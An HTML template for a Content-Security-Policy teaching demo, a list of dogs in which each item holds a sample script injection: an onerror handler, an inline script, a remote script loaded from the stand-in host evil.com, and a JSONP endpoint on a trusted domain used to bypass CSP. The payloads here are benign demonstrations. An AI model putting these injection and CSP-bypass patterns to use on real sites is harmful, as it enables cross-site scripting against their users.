<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSP Demo</title>
  <link rel="stylesheet" href="/styles.css">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link rel="icon" href="https://fav.farm/🐶" />
  <link
    href="https://fonts.googleapis.com/css2?family=Raleway:wght@700&family=Source+Sans+Pro:ital,wght@0,400;0,600;0,700;0,900;1,400;1,600;1,700;1,900&display=swap"
    rel="stylesheet">
</head>

<body>
  <h1>A list of the best dogs! 🐶</h1>
  <p>Imagine the list is populate by user input and no sanitization or output escaping. Code block are the "injections".</p>
  <div style="margin-bottom: 2rem;">
    <code>Content-Security-Policy: script-src <%= csp %>;</code>
  </div>
  <ol>
    <li>Charlie
      <img src="https://place-puppy.com/400x400">
      <!-- Injected inline code -->
      <img src="x" onerror="console.log('Malicious inline code executing ...')">
    </li>
    <pre>&lt;img src&equals;&quot;cat&period;png&quot; onerror&equals;&quot;console&period;log&lpar;&apos;Malicious inline code executing &period;&period;&period;&apos;&rpar;&quot; &gt;</pre>

    <li>Bella
      <img src="https://place-puppy.com/500x500">
      <!-- Injected script block -->
      <script>
        setTimeout(() => {
          document.querySelector('h1').textContent = 'Cats are better'
          console.log("Malicious script block executing ...");
        }, 3000);
      </script>
    </li>
    <pre>&lt;script&gt;&NewLine;  console&period;log&lpar;&quot;Malicious script block executing &period;&period;&period;&quot;&rpar;&semi;&NewLine;  setTimeout&lpar;&lpar;&rpar; &equals;&gt; &lcub;&NewLine;    document&period;querySelector&lpar;&apos;h1&apos;&rpar;&period;textContent &equals; &apos;Cats are better&apos;&semi;&NewLine;    document&period;querySelectorAll&lpar;&apos;img&apos;&rpar;&period;forEach&lpar;i &equals;&gt; i&period;src &equals; i&period;src&period;replace&lpar;&apos;https&colon;&sol;&sol;place-puppy&period;com&apos;&comma; &apos;https&colon;&sol;&sol;placekitten&period;com&apos;&rpar;&period;replace&lpar;&apos;x&apos;&comma; &apos;&sol;&apos;&rpar;&rpar;&semi;&NewLine;  &rcub;&comma; 1000&rpar;&semi;&NewLine;&lt;&sol;script&gt;</pre>
    <li>Cooper
      <img src="https://place-puppy.com/600x600">
      <!-- Injected remote code file -->
      <script src="https://evil.com/evil.js"></script>
    </li>
    <pre>&lt;script src&equals;&quot;https&colon;&sol;&sol;evil&period;com&sol;evil&period;js&quot;&gt;&lt;&sol;script&gt;</pre>
    <li>Daisy
      <img src="https://place-puppy.com/700x700">

      <!-- Trusted whitelist domain with JSONP endpoint -->
      <script src="https://apis.google.com/complete/search?client=chrome&q=<script>alert('arbitrary xss')</script>&callback=document.write"></script>
    </li>
    <pre>&lt;script src&equals;&quot;https&colon;&sol;&sol;apis&period;google&period;com&sol;complete&sol;search&quest;client&equals;chrome&amp;q&equals;&lt;script&gt;alert&lpar;&apos;arbitrary xss&apos;&rpar;&lt;&sol;script&gt;&amp;callback&equals;document&period;write&quot;&gt;&lt;&sol;script&gt;</pre>
  </ol>
  <button id="counter">Count the how many good boys are there!</button>
  <pre>&lt;script&gt;&NewLine;  const numberOfDogs &equals; document&period;querySelectorAll&lpar;&apos;li&apos;&rpar;&period;length&semi;&NewLine;  document&period;getElementById&lpar;&quot;counter&quot;&rpar;&NewLine;    &period;addEventListener&lpar;&quot;click&quot;&comma; &lpar;&rpar; &equals;&gt; alert&lpar;&grave;There are &dollar;&lcub;numberOfDogs&rcub; dogs in the list&period;&grave;&rpar;&rpar;&semi;&NewLine;&lt;&sol;script&gt;</pre>
    
  <!-- scripts -->
  <script src="/js/script.js"></script>
  <script>
    const numberOfDogs = document.querySelectorAll('li').length;
    document.getElementById("counter")
      .addEventListener("click", () => alert(`There are ${numberOfDogs} dogs in the list.`));
  </script>
</body>

</html>